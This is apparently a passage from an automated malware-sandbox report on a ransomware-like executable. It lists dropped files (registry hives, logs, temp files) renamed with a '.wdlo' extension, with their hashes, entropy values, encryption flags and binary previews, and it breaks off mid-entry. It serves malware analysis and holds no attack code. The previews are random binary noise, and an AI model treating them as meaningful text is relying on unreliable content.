                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):6906
                  Entropy (8bit):7.975122328504494
                  Encrypted:false
                  SSDEEP:96:Jg8c2S0J6Tx7bs4UCGNzkPvrPT4Xa/LTyvTS42VqbGGhqX72k8ivk495Kl:Fc30wV4rRNzkzTDQ24Oqsn8iul
                  MD5:ED14751746DACBE6DC97EE5C65AAD2F5
                  SHA1:C1677D63734A8E5E134BF3839191A76B827F8DB2
                  SHA-256:6F1A38CB9640BFE265A85FF348AD8073536FD197DE5303D7250A4E96E0DDE28F
                  SHA-512:D3380525FEFB14815C42CEF03DB92ABE952CE405F8D0E9A7C280672EF3491EA12BEB25018D7538D506ED55239CD4D6356562376FBCABF99C0FA515A85778571E
                  Malicious:false
                  Preview:10/03..!...7#..eV.g...o...._...xh>uw3..z....:Hvc. E.u.%.-.QwT.:.%P......I...;}.T...../....+\7..'.~....r..)..wn...C.s5;'.*..!P..fnJv.H..gZ.+d]...k>....).....'}[...x.s..........u.J+..K..~....p....8a?...?...4.n..H^..D,lf.L....Fh.&+.l.9.mVC..R.......F....I.z...P./Yj8.5{..$.D..N.?&....nH....=.8.'. d....s~....tFv...J.!..".-.'.y.a..:.R..vaB.s...P....B....1.......O~..a.P?.Rs_>p.^.[y.H[.....},..U..;s.2g....z.u.st.-K.k.......H...u..CY< ..=.b...b..e.Q..... ...|..Q......E}..J=.... E...D...a..r.J...n5@.f..7.u..W4.=.;........./............+.t.....2.f.,.9..bI.:.y.&d:.8Z..8..7B.Gd]>zZU..|....Z....U.bf....).1..Jy...^8..(.P..a...l..o.k..6.h.z....+b[..MR...X....~.....,.]...^....D0...&...-M@......I.........2.....7....F$..a.O.[K4.8.b@7...u..v;].R......>.JL.#_.:GFB...(.?l.+.....)...3d.....s....f.9D.~.'C...:...j..r[x..}..M....`......r.......kr...$....).i.3.4.j.03.b....Z>@.G.Z...J..{R.T|...M%...1.y=..........l.,.\~..l...:nLg......A.....]......C.

                  C:\Users\jones\Local Settings\Microsoft\Internet Explorer\ie4uinit-ClearIconCache.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (416), with no line terminators
                  Category:dropped
                  Size (bytes):834
                  Entropy (8bit):7.734689144361318
                  Encrypted:false
                  SSDEEP:24:QUBye/4RfFIp4HCBtU0qeB3PaNRvWAEVH69fHLyQM73zbD:LtMfFq4Ytcy3PazWrHMHLVM73nD
                  MD5:094086A3A3C314F65BDD2820E030486C
                  SHA1:B9FF8C3E39A644B531D91C621DDCE38E96011D6E
                  SHA-256:B943163930F0A93CDDBBDDDB6847F50811B641DA6CBB59E8C013DDF7EDC479A0
                  SHA-512:93FDCFA5798CC7CE5A17BF2CB2FB2909F060E8279E4A0F86F0EBC46E7066F38282AD166EF1DD272D2FFC0B2ED4776DC403A5E593B7A9EEDA6392AE6325E68274
                  Malicious:false
                  Preview:..1.0...%......]..?o..w..{.&G.......R..B.lN._.'.*.?....8.k..O..X.L......c..D7......p...^G..^.k.....%{=W(....Q.v..y...n. #.r..T...a......"..].}..G.d.....Qg1....?E......@.,1&..^..97...~........{...>lS.S......`......v.)O....+....|...........v..wt.p..]|.../..........<S/.'.,.N...F..R.....e.T.{....&...95..9..P.HzM.(d{..F...9...).)"..}.. .xPi..=L.....$h.2.......;.[K....W..[.q.I.8J.r<Bm..pyq~t...'.{.......vL.*`x.3u(.R......,M....v4.|.M..N.(q....B1.D{f....i...QsMz."..q..a.}..n..."OD8?k.h.G..]o,....G.z.Y.A.!cSd..?;T...OY.X....-+f..s...~.x....`.[%.Za.._......D........?..n..........c!....x.C77.,.....X....L..3}:...&H.(n.;U..[X..kLn.h.Q..T..V...z...t.x.d7...t.k..._.G.a...}..S2.`.D.d[...[8c..>..7......W..".....q.[_.d..b.6i0fXrUHVihm5xsI9Icg243YMPJqd748Ocimkyjt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                  C:\Users\jones\Local Settings\Microsoft\Internet Explorer\ie4uinit-UserConfig.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:Unicode text, UTF-16, little-endian text, with very long lines (869), with no line terminators
                  Category:dropped
                  Size (bytes):1740
                  Entropy (8bit):7.891106413284633
                  Encrypted:false
                  SSDEEP:48:Bi5eZG70SiP8eLfpGiv+AZbivZ48goLZlxtGvO3nD:45MVUeVGi3Z/8gUleg
                  MD5:42676C04500BC45C2E84066BA450B372
                  SHA1:44161699A95B388C8E1FD8A5D8D4759B3EA2D653
                  SHA-256:EA8549EADE08DF536DC3D2CEC3006788F01A8BEC7B4C4752E3245E3D05A6A8CC
                  SHA-512:B25FC2B461F06656AA9AD1E44F806C0C4E829725D14DC76928D7515D8B7ABE93C871D4CF5D3F01AC05F5ADA478376F01BE69E5C7421A967C36FF0284C6FE9083
                  Malicious:false
                  Preview:..1.0.h,.k._bY:...@.M_.G:Z.`-1... ...3._.'..I.J.z...Yr...1cc....wz.e...Q.<..*un...MRH...>.]S'P.>x.,.A......M..R.."..I.".#.....S )!..Ck...^A..5%.H.D..Z.T.>>....k..d.3 \..^w..Dlw.MW~{..`9...E......D.~2.P.$4.S..Q..S}.'.`.J.5.}....f..._..@f."..<...q,].."c...G.P.[5..d.#..pQ.(...e.....:A.4.<FQ. J......!7j.x.\g.....s.W1.x...Bd_.+....T..@z=}...$../}o..olq.I.zZ.>/>FL.pc.0u.H. ~.....lQ%.x...0..h}..p.../G..sMKx.._.c..x1..XN?.<..g.....m.&..~.k.'...w.....sW.KC..Rh\.../u.......b..F".;...P#V.o.....}Ea.j...MU.b.x......5..-....T[.p.........G.......G?.......t.mz...y>^tu.......[?....0...-.H.....6....zq:8..a...S.l......yp.......b.q..d..;M..A\M.h.5.H.........%..}..1.R.Km..L..1...H.....=Ft.."~.)I.Z>.........V.....k..@t..)..G....^6^.k......4..)U....,-.........]S....P..c..X........w./.s..7j............r...S...b.cg.73..w.w.."..S@...viI.E|l..-...v.O.z.%.D{.....f2.@.k.V..Kb........w*D.2cE....)(...D.aQ..B..Iq..s.h.y....l&}..j=...=..w..."..... .W.NoLn.4..s........vDm...Z.

                  C:\Users\jones\Local Settings\Microsoft\PenWorkspace\DiscoverCacheData.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):1353
                  Entropy (8bit):7.865071693406819
                  Encrypted:false
                  SSDEEP:24:Ylcg3GAnat2w6XRNjhPM682aQaVhUUFQCqZfCZA3/b9OHeHhxVD3zbD:YakGFt2w6XRNjNMgaLhU4QCcCZmXHhx1
                  MD5:BE251B4A704143A5E5330B0FA83B3E60
                  SHA1:C3D8D38F638CA7021488A94481BC35216B3407C0
                  SHA-256:9573AFDA545EE8D451462A1194D137DE67B987BFD1ECFFBAD66B6592C59418E8
                  SHA-512:4EDA99DB8E20984F3404D17AD2E9625724CA64425877923620AEA546B373C316AA1D1AF473F4559E9C5187FBCCAC53FC3EE55F753FBCD9DDC5AC7A8639A5F8D5
                  Malicious:false
                  Preview:{"Rec..ZPD0.E7..#m.:.w..1..!X.)05...T..W,..{....w.(.0.r.:N.]..g.....M.h.5G...,T...k{..O.T.`6.m......jFH...Y.....=^u...4M..[.c8o..)....U..\.A.&C...Y?...n|`.oa.9...'...'\..............c...;A.+........|......Fn.....R..w.;.:x=L>b...g?#.Y...C~...p.p.2T-...6.....Q.1V}a.9...K......O..z..p..uP.d..F..5..^.l.........&.RP...|...=N#&..]A..8.H..W.....N....Wr..C....N....s..w|.]..p...u&..K..C...r..(..N..T..].Y.>Q...._.....s c7F....f.v...0.......{.....z..5ViK`..t..>e.Q.....rUP0N.0.K..C.vDm.Xx.E..].?..x>,aR$x..[Z...uK..(ER+..............N/....=G.O.R.3.Z.]`.s........}.3.....T...........5].n.X...W.*...z...Ms.t$..s..........qZ....w.{.[&...@"..$.&.N.]%....V..7.. E.,....o>.Na.p...HM.".xPEk.......pY...JK..W.........c&(>,7x1mK2k...@.....c+....{.1.{=,.O8.KV...Z..1..,f.$S .l.S.....L%..8Dt.h)..e......,#/hAG.9:.g...F.JG..)9D......O}..e.U....e7.Y.J.7...f.....Z....'...S3L.......q6...Y.3~..#..W...c.Q|.2...&.. 0'.....3...x..l...Y.X...m&.&.....ntX......8.g.".-...om..

                  C:\Users\jones\Local Settings\Microsoft\Windows\UsrClass.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):865614
                  Entropy (8bit):4.097782130105416
                  Encrypted:false
                  SSDEEP:12288:RY50ikpF2ZZJC6JZ2yfZyWeI4VTZZZZJC6JZ2kZZZJC6JZ2zrZZJC6JZ2x:RYmie
                  MD5:8DEDA57E5927454565F1E0CBC5E2225B
                  SHA1:09627B3A0BC8A4F63E21B042352B4C0E7A59CD7C
                  SHA-256:1DEA7B829D0B61E724CE1001869B81513F6EDA0C18FC0351B6C5E286AD2BE700
                  SHA-512:31A327093CED2030D7AB6DA4FCCFBB095D3BBC3010D624415B3DF1CC33270B3DC81AD8C4578D84AD69E9A58D734CCF133D5AD48EA47EB23221C14D367F7FE5F0
                  Malicious:false
                  Preview:regfCD...M.l....57.........'.#X..N".."mo......uV.*.z%p.pQ....#.R..:5.W......\;.%.$.e.6..r.d=.*..%<....Vq\.0B..)....6D.....t.X........o.Z.fh4.L..GM[..U..k'@a.4..Y.....T-.+..2u..c0.;......e...-c..L..1.Z.t.A&.P.p....._]....#9."}.&..9qCO...........R..^D.?.].....j{.$c.B|..;<<:...T.L..LT.%G.N.A.K...~"70f.....s.Y..O...H.H/..\E...vFe.".b.5.{~Ye...(R...E..r*.J ..SBc.m..e.K.(.wHS.......(..."....&.F..O......T..5..eJ....+..g$..|).e)7.,..qvx3.( . ...Fme.........b...*...~R...iH..*......#@..o...LJ.Z:p.......vK.Un....5x.#......x./@V.>...y.".O..vzJ~.8.Yn<..0...2R....;...k3,._6..S.l..q.yR.-.zJ../.1l...V..#.GS.Y...c+q..?.#A..j..`.5E..0..v....;.../._r..$......9..C..y.A......^...F.wP......H.......).........}V..HT..i......l...a.Ln....u.#.......C....(.r.t.d.....U..=,.`...6.&... 7:.h.W.d^....^.......e?..~......|....+......VN..MN.RB".t^.O.....N..J=.!J...G-..l...cE....`.UJ_.\....V.-.$.....8_?.e....x...p.*e.p..O..aZ.....{ ....z.u.c....,.*@...2.v..U.g.5.6.iQ[<

                  C:\Users\jones\Local Settings\Microsoft\Windows\UsrClass.dat.LOG2.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):865614
                  Entropy (8bit):4.8148839123741025
                  Encrypted:false
                  SSDEEP:6144:QicauC747V0uGKGZjUowb26scpbJ6JZ2CM2C6JZ2g:QiEGuXGWoUJ6JZ2CM2C6JZ2g
                  MD5:0EFC0D4833EE3919510BBD07D26244F4
                  SHA1:D570AE1EE81B0D76A78239FE8DBF265C7A6F54EF
                  SHA-256:F709290AB133563EB8B9F8BA0BFE143DA0F515D86D4CF215F592C9A80DCC5898
                  SHA-512:75F6753DA24E308498B21F345319119F4CBFECEF2EAAA44945CD2B2C1DC1BD7D70F0AC9EDE9F571F52FCACF8CF180FBD5D53A1DA9C09194C6588CB87BD11D1F3
                  Malicious:false
                  Preview:regf-.M0.D-...-".3.%......l^.i........gd.Dm.a...0...B...../."y>...*...m>.....4&B..u.]...b.\9.hlo..... F..S.9..Z.P.L....^...&.-....../...".S.....L;........,..H.........Y..Z....\.C.P...s.d+....D..,.'||(......V.....R..Mkg....d......!....>'Y.d...;(..01............l.h......O.OJ...7....i.!D.c/../......c.........r.v.pLu.^.v.W~3-........}.{'.o...;....e-.......u...m.\wpP.].^..s]:.<hDO.C^V....z..0.................+.7O...D9..-.$..Y.&. ..k.U..v.L....@...cD^|..,.E.........0e`g.p...|.zB..F.A..\.......U...#....s...).f.\...R.....Q0..=._ ...l`^..2?..{...le..@....^....$.Z...M..&.H.5......FI.s2G..2.{.0..soo'..w.U.5..R^.P.+....'.....u......,.NZ.EG..oq.yk~.:..A.I..u..k..V...#&.@..1?.....V.:..`..U.......O.7....wdknd.E....D...\6.)..0...;p.rI.|......_..Ws<...~xx9|...5.....h?..'....<{..$.s.*..l....)X.....T..}..'0..t......&.....RB...3hE..=..{.v..bWg..e./(........^..9,..j.....8.N.......N...k.<....).~'....b/.....41..Z....;..v?..(#3.<...-..e.........Ui.\l.3..2.

                  C:\Users\jones\Local Settings\Microsoft\Windows\UsrClass.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):3408206
                  Entropy (8bit):4.763102132647779
                  Encrypted:false
                  SSDEEP:24576:yVpu4G23XUooy1ncWOOctVMiA8DqkXci5QStPi5Uva:cO23XUooyCOctVMiA8DqkXci5QCy+a
                  MD5:F302B7FB4DC43C04705FCB0ED7A47E9E
                  SHA1:9144B08FE603CF975BF437F8E4EEE08AC87E4D38
                  SHA-256:0AFB3EDA7F889F955ECD41888D6A003D5A73C38DB526CFA49FD44B0E5DBC63F5
                  SHA-512:78011069AA5A771806AF05ABDB1282EBCA5147A435DD9396D9822969B9F072135B1F607DE956A98F7B4FD5FBFFB8227783165BE3E4D75F018D5E517753371178
                  Malicious:false
                  Preview:regfD...x..&....n,..h......P.<,.K...+.kc_!S5RXV.....0u.G.<..W.dS.c^...!.&PC.....^7K.8...w..]..K..}..:.....{.......,)...#d.;....g....{y......E.RaB3.x..T...}.M.S.rT...<..0..s.s.!..h.+....Q........k[..d.k6.kcR;..>..U.4.A..H.?.~.\.o.Im....:x.|o........D-oM......xD.|..i..I.5z.l ...n.u..n.4C.E.F..%*n".q(J$.@.<.}.@...-.Ck.1....}..;R.)....^..e.,...'SK....U.%,..6.CZ.......|[I=.....v......i.i...;....q....[htd.oB"....."U....HAmj............'lU+.S&.3.e.Q..l.C..{.|..5.....k.......&yzk.........N...=...i.L..*...@..G..6x..4..%19n@.....5....yksR.<IP....2.......z;`.....Tc....i$..w....l.z.9....{,.P.e..C...&`_yM$Om>.l~.k..?..8...{H..N...o...ZL.S4.O...\...4.P..O...].j....?.sd...5_.....#*.|{.MW6............M/`:...Oe..9.dz.....^.p5.o...4.y.[.=v.S...1!......M.......e...L,..;.E.I.%..|..k6KLA.{=VY..{..E]..w../.LL.........'...<.r..8..B.J......q....S.gw .X.Am...../w..x.......X...k._.?..X.0.......{..?.X..]...l.~..R.<..^...YI.g.b.g....A@...Q...!K*..../Q..;?4....

                  C:\Users\jones\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.session64.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):66542
                  Entropy (8bit):7.997302385520275
                  Encrypted:true
                  SSDEEP:1536:vIGjFQlhC5ExvFr33RYQDXi9w9wGmqNmSgs83PaMS8tI:h5dExdlYoiQMSg3ZS8tI
                  MD5:ABF2B4DABD62D20D43E44F6388DC5786
                  SHA1:A2FB3AEC888EE79FAA84781D94A074E5ABB78CB0
                  SHA-256:E9B6C6C207693DC5E9F9CCD0336CAE77DE0845539854F1C0107BABC2AB867069
                  SHA-512:AD2005DF19EB36A014CC5889C94967F7C4501617D5ECEDB1EA2E4D330D54593972EF34CF3EA2E3107854BE362FA86A818D24D8E4BFD9C3312B98C5562E53413B
                  Malicious:true
                  Preview:1G.f.L.Hx..b.14}....7.A.........xE........W<m..f....^W..W...DJ.{.i......e.....(..LwW w.F.u.E..H..%f.U..Rs....<.$...........L....m{.>.|...o6...a7._.....?...x...Q..O.$E.u..J.^.U.......j."f|.p... ....[1........m.....XJ.....^:u.p.K...........d....j.......9Rr<....st.ey.XN..5et......d..Hc..2\_.Q...&AJ.....)A_z.B.......Uv..<....+..A.>Y...E.g\....1w.E..d.h....-.\).#r..%....C[..-..:Q.1..Zq.Q\...=.6.....i!.....S.~.N..u..9...\.xh[2....8.....D>.....G.......e.....zyi......]W.Z.....x....Q...L......oZ..a^.W.`C.....3..f.F.\....i.K..es=..F4.....9."i...cN..d..c(V.)..R.^..........$95..*9.V.L.\..f.f.s.................B...Je..T.<.jm....+.:...{;..rRXx....!*.F.J....J1......oKc.....<A[.#.-..P.$..U4Tq.......v.t...D%.A..b..*..T@.G=T/.=...n..O/..M.....v..`..........I. ....."A.#....-.....%JE.o...g...,.TD..Z..P+!..I?.....1...'.k..^.0i..c.G.<..1C..37#..9...=......Y..OmM:+....R.l..m.5.^r..I.T.z<\.h.W$ZP^.W.C8.3.o..T^...>'o.@..DZ...[..T....0..........t..NA..k....m.r@.

                  C:\Users\jones\Local Settings\Temp\18e190413af045db88dfbd29609eb877.db.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):24910
                  Entropy (8bit):7.9937003778969755
                  Encrypted:true
                  SSDEEP:384:CxCVJtQG4hkPV6QC4xdD3fFWkkrN1vDxHpNfHujEttxbUU35kGWS3Y+Ye6ZCkHHX:EUDrPVDr3NKrvt7fOjg+a5kGWSZIH3
                  MD5:9CC830188B57DC94F6D4EE1B13271E4A
                  SHA1:848FAEFBDBECE682B792432A39EF7F5BFA4745C8
                  SHA-256:1896957005F887D0B1B2B0306244BF8358C25FE32F7062B6C68BA1E1B05D0F5D
                  SHA-512:0FA8E12CC339CF4B2583EC4A2ABD0584DE30BC622E69FD2E569DB78311CD23BDF8D144F4A3A38EF97E6E876549612150385ABEAD5621B9A7285A5F0B3D0D2A96
                  Malicious:true
                  Preview:SQLit.%AwneK.`.~.L-)..GJ_=[9.."E...O.a.e..*....G.DU.....4.P.odq.Xt.Q..Qm..I.Q/Q.f5@.h..W.:....m....g.F4;...d.T+}5w....s...|.?.mh...PUJ..UA...Pf..|..../)....|X....c..M@AZ-[e.....+...[....~!J. .f...sg.6_B..e.R. ./..(.z.4jI.a....H...l.!.\QVOs..Ps.aC.&.v.....I....0.?H...6u....v..Epc.Pe3.n6j~K...1.O..Q.U(....]9....J.W/...1...Io........^..].*s...Y..f.i..5.|=:...n.<..dJR-.r....+.....PqYHO.....2...$...z..A&.u.Hx...q......$8....?.;..&.u..z..w.HIsS...~.?&.-.....].<.x.R.M?......LK..Y......4.r..P.,.D..Z.n8...b.........]%.$I..b..).'..7X....Mi...b....?..j2.cg... |...%.E....nv.N...e..|..Ki#..=4..\.DG..'.v.G..3..j. ....0..7..m.....b.g..b...\Th.j..G..Z.C..z........j.=.h.jv..[zW.b.V....j..J.u.vv.P.m..dj.p......1.igs.].F.V.}s..c..y...Y..s...qN..D....O.!.......(u.H<.|..!.vW....C.{...../.V.3W.+...).lv.+?)...h..E......e..6j..AW~..W..E....|.L..H..\...P8..q:*..F.L.6.o.....f.wo.2...Jg.".'..:BJa;=...}.S.Ax...mI..Y.._D..X.=.`^S.F.:T...~...}.....X.......1...TI...<..b

                  C:\Users\jones\Local Settings\Temp\AdobeARM.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):5101
                  Entropy (8bit):7.96340827956018
                  Encrypted:false
                  SSDEEP:96:oIYOGGn+sjwP35ktesLrEUew3cgsz7vuatTcjgl91UhvkfDCIPO45lTF8SCdVn:XYY+s8PJw9rEUemOfGje1rDHbF8SCzn
                  MD5:7A0E5D92F775D79E3D21F1D8DC200FFA
                  SHA1:5ABF34F3D6BAC8BC26035412C0453200F8BCF3A9
                  SHA-256:A96F8C0ABDBEADB89DC0DE67E323FCC11D380DDB2BCD25E5926966C8849A122B
                  SHA-512:DFE4BD37C3C23CF36D708D2DA52642AE72106D07ED3651388C1DA01D77435D896DCE195EB1F36D28BA54A3E021A50D2CF227ECB8F988ABBAC880C1E157FB38A5
                  Malicious:false
                  Preview:[2023..oW..}..4v......".....}....rZ.*!.:.3..+.#..E.SP...a.5.z%....G..Hoi...G.....&.T".#gug.8.w...,.."[~.2.3.d......6..X+.......A.`...xD@.<.;..VD.A..;k..7.i.oN..m.0...,......%..qU99..(jd....Gz..-...!.OW9.:VT...S..C..O..M\'...U Kx..oi....W.M...r.......^!..^@.......y.i..,.,)..t;...ct...m&...d...`.M..|#\.eQ.....IH ..l....z.y.i.Ii....N:....).E.3q..b...3hA7..T..S.I..Y...v;..x..v.N0.;);...Sr.>.q.....fvB.F#w.:.50j...<5.F5..........Q.kj?..ei.'r(....7.b.`....j[9..Y.......9B7n...g.....G.R..........Y.O.)...-2...+....n.........!.jS.q#.oU[..`^.s..p.*..?.C([<<_hv../....\"q....8...t.*M...XA..S...j:8P......C.V.....K./.DC.$...^.........`mX...zmX{%D.w4.j.:r._......*.....l........?...}.4.,....s..Q6ML2..*..1?F...*..JDDA.M........}.j!.Jn..!...]..#..a...J>.K......t...M..b3}..H..#.Q_V..G......i_h....P.Z.4..h.3.......'.Xr.+XgE.....FP..d..b@.....c..Q(.g......p~K..q-....~..Tt.y.&.._"."}.N..........W....:......3.f.............kiY..`._..X%.a.,...o..Z....s

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1258.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):42850
                  Entropy (8bit):7.995481854711741
                  Encrypted:true
                  SSDEEP:768:+FJdckQDavnMRBVScc6evO16psJUnVmPkzkXiGNmicYolgCw2SKuUjHOrnoKziD8:OckdMRGCTcpZMSgiG4coc2SKhjHOJuD8
                  MD5:95E2C25D1C1A08F4183EE0FCB86C1AE7
                  SHA1:13B51393CCA8EA40E2532562C8E9CC1438B39BDD
                  SHA-256:727BB641F9D2012C86BA57DDF0EAB42DFE2768B75B72C8B6544174AF8C72BB40
                  SHA-512:A6C010E2994E80D128415CB839B72036A4A069AFDF9C75CB5AD25810D1A983CF95D8A54EFFD59CF948C6AB51CF9F54B98ACD1CAFBCECD12CBCAEBB6B8C5EF53F
                  Malicious:true
                  Preview:..T.i.k....t..u.dc..z.r..b..:s..\.@`N....r.H)Kp>.:S~..P.~....W.mOpP......!K.s....y$.?...P....H..x...$]@.........:b.....?...|..?.*....0v:6.+.d.sV......v........ .?.\...}.R..\px.k@.........(..5_.!......x.....[r1z...*T........A....~fTlZ.[..$...4._.......e...X........]?WPl....Q.=PF.}[..f...Y@....A.....n"E...g.Sk_.../d7~(..L.(2k...&.Hl...Q`..bX.]...!..-..b...fMe...Z...`.a...B..;.$....\.._..1.B...!5.J'+....N&....b.w.,.&].}...).OL...aN...........j.}H..g...Ek>..j.e....(.Rf* .vj......6:{*/_.ME.6..?.V..?.`...;g...Q...IQ:.$.>\..G..B..+.............nlt..O..I........*.-..,...??. .....E..B .1.-P.QO4..\...M....z.Z.:r..#.90....TL..k..?H..v{.X...=..C...3.I.BA..V.h.P..Q.a..|............@..,GYswi......i.....{z.C.b._...6..Suw.\E...t..qpWq.....fY6 .Vv...V....0`...Fq..........;9s.b... T.t....p.b..>...cb.Q..E<d.g.^%K.....5c..u..W....|b.2..nc.T).7....*e..K...(...}.r...Y..+..U..'...5.+....b........+kq..u...A$pN.C~Z..B.e..h..$..&..$...2.*.....M*%o.#.D.../

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1258a.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):462288
                  Entropy (8bit):5.851075241826565
                  Encrypted:false
                  SSDEEP:3072:iL2m0OfAvyG/dby6pEI9IN0nFbsH22xVS8eDo5UaMHebvAx3tjhfF1c/UU/kujtI:BOf5GxyIhnYW2jS8JfG9jFFuc20
                  MD5:E0CF186F80ED630001CCEF0C0032FB7D
                  SHA1:6361A969F899D8B5A3BA6989052E4D6016C93393
                  SHA-256:B8140104ACC27EEFE952712A514BB82D5261FD1DE04505F28CCE63E9B5996358
                  SHA-512:A2B594E26D1367A2DD479E31B122D229AB290F18DA53EA9CF5CEBD79D10D23BA97918B7163856D6E84B358D06B02C79F60358D98E9FE0322F6ED154BC2648A55
                  Malicious:false
                  Preview:..T.i|FwP...O.JQ.#.........1..s.._3..>..t.......S......a~q^.....H.*..!M....$.zK..{I.H..........TKL..~>..r.<.d.@.r..........Dg>..3....C@.......5.a..t...p........ ..w...M..-..H..$5T...!*J....._".<..&.Xa..BS.(..(.?.L......<Q.\s.mp.L..1M......%J.....m..^B......96.{........P.).&....S2~.#mm!..a...;...V.F.&.J.....f...{1....j..U'....gr..3...V!.'.....E.f<.N#......<4@Q.X...Plv.Bt..(K....2../........y1c.<2.S...D.....O.z..`.}&... ........zO...^.....(..}.+t...=..vf.*{.a+..4...z.I.*.Z&$.....$v.%....F._Hz..5n=#..@...#.Rs\e..l|...96}.X[.Wl.D..Q".........n.y..gH...|+.}....5a........Z..RD.>\K.......qN.t!.C.vs...P.....0".J.O...+mC9~.c2..[.=..Q.W.K.*.d.\C..Qw..g.. .{.O..R.'?.x....c.....}V..z.0..i.3L}..AAk>..R_...YQ.0ze~M...!..".&B.......@g..w(...d..C.u....p&...?..........)mK...H...,..k/..%:e......;..E.7|...3....O9.)rS.Q...p..8X^..2g...kr.es<.P.'3..X.`P...S...v...ax.2OV-..0(..;r..pN..5.q..*..P-)Fov.>.......HL.V...DH..#....y.<.......E..g....yS.k

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1258b.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):289976
                  Entropy (8bit):6.696255604343023
                  Encrypted:false
                  SSDEEP:6144:SWopxjp3sCkgPV676u6QzIcGnivkuX0b39/22ZOKyymLe9qDOey1CAXYa8AHYGAB:SvPNsCF2zIcGnivkuX0b39/22ZOKyymV
                  MD5:7CFC3B17BE969197B7E263C561C351CE
                  SHA1:BF8C0702707289F514C88C42ECECF9976B393B21
                  SHA-256:210EAF67FE7637942F2EE8A1360143869625A834E42DFBAD9876C0FAD2C2CD4A
                  SHA-512:C07E351456C7D933DB7449FA399F9E55FE0B6201AF6E58AF1C8AE53C6C858530DD393B37E7A002B23D7B466ABB3CA16EB82E72AF9F8418279CF04037C755AB6F
                  Malicious:false
                  Preview:..T.i.s.......~"2.6.p.cj. .U...Hd..ps5.&!.....1ow1..G..T.s.@.L..K...@..P..Tl..(...m.'.YN.!D.{s..rl...G.n.%.../H..D.i...RhU..MS..ZI.V].2a7mN...4..K...`.wr|...i......2...0.}q(..{/.f.r.Nm......C.R..ZD..07..Qg..r[.4.......g.1..y..{8..<,R..#.......L`.@..x.e...&Xtq.>.r.#sL.3.<RTl.={./e.&R2..C.!0.vr....Hz.X$e..^@_.A..,..0@^uq:.<^^.....R...!x9A.x*..B...cQ..g.1...D.D.=...^2B...?....o0I...:......\h...<U..o^.;#....K.6....8m;Q.. k`....27[..v;.h....!UA2q(.....N6.B..d6X.....I... L~....2.m.Tp.............a0.....(.. ...K.D.p~.>l...D.......,..O.........l..;.p..`..i.wR..\*(".....U/..9.EU7V.-I8x.3Cv........F.Y.L..d.?..XIBn.n"..8*l...P=.n.>%...=.S@...j...'....fw...].8.ic.....q......qx7..+K..C....P.f.ZJ!..&H...&7..g.`.7.x....+@)XJ.+......).d{..B.7.nm.*r.........,...{....V..&R.^..Tsv~R!6....K..N?.. ..0...Z-8!..L...wHh..M>...IB?.$...CZ......T.~.qK*.cJ....O....s`..3.l...D....].EL......c..|y.F.........z.Rzd..?h]ty+.j.[Ne.T.Ou.e....>..6.............d4

                  C:\Users\jones\Local Settings\Temp\DESKTOP-AGET0TR-20231003-1258c.log.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):98568
                  Entropy (8bit):7.998222967720194
                  Encrypted:true
                  SSDEEP:3072:Y9HfNqNqZPp93TBAn8yZUwqCi7Y9TyaL3s:Y5fENqDXA8oEYZ8
                  MD5:760E616B33F51FC23C5BAFBD342199AE
                  SHA1:7B324E45FBA831DBADF6F4E389BFA2B5B6387758
                  SHA-256:A642BFB51F8FFDA41080B1A7526B84230954B263223CA9DA67A0581E86FEB1EE
